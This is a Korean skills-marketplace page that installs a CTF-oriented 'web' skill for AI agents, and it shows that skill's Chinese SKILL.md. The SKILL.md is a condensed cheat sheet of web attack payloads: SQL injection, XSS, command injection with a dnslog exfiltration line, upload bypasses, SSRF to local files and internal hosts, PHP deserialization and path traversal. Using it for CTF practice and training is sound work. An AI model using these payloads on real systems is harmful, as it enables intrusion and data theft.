Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
직접 명령은 검토 Prompt를 거치지 않습니다. 실행하기 전에 소스를 확인하세요.
npx skills add https://github.com/MuWinds/BUUCTF_Agent --skill web명령은 한 줄로 유지됩니다. 복사하기 전에 가로로 스크롤해 전체 내용을 확인하세요.
로컬 사본을 원하시나요? SkillsMP에서 현재 제공할 수 있는 파일을 다운로드하세요.
SOC 직업 분류 기준
SKILL.md 표시 중
| name | web |
| description | Web 安全攻防技术,包括 SQL 注入、XSS、文件上传、命令注入、SSRF、反序列化等常见漏洞的识别与利用。 |
| tags | ["sql-injection","xss","file-upload","command-injection","ssrf","deserialization","php"] |
ORDER BY 确定列数 -> UNION SELECT 提取数据AND 1=1/AND 1=2,时间盲注 SLEEP()/BENCHMARK()--batch --dbs --current-user/**/、双重编码、HPP 参数污染/*!50000select*/、%0a 换行、<> 替代空格<>\"'/ 过滤情况document.location、innerHTML 等 DOM 操作<img onerror=alert(1)>、<svg onload=alert(1)>、编码绕过;、&&、||、|、\n、`$IFS、{cmd,arg}、%09、< 重定向a=fl;b=ag;cat $a$b、通配符 cat /fl*、base64 编码curl \whoami`.xxx.dnslog.cn`、时间盲注Content-Type 为 image/png.php5、.phtml、.pht、.php.jpg(Apache 解析漏洞)GIF89a 或 PNG 文件头.htaccess 添加自定义解析规则file:///etc/passwd、dict://、gopher://http://127.0.0.1:端口、http://192.168.x.x@ 符号 http://attacker.com@127.0.0.1、进制转换 0x7f000001、IPv6 [::1]== 比较时 "0e123" == "0e456" 为 Truephp://filter/convert.base64-encode/resource=、php://input__construct、__destruct、__wakeup、__toString 魔术方法extract()、parse_str()、$$var../ 目录穿越、%00 截断(PHP < 5.3.4)